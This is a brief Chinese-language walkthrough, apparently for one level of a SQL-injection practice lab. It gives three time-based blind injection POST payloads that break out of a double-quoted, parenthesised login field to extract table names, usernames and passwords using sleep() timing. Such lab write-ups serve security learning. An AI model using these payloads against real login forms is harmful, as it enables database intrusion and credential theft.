相較於第 15 關,單引號變成了雙引號 + 括號
–查列
uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查用戶名
uname=admin") and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查密碼
uname=admin") and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
也可以像第 8 關那樣寫一個腳本,因爲只要掌握基本原理就可以寫,這裏就不再構造了…
😄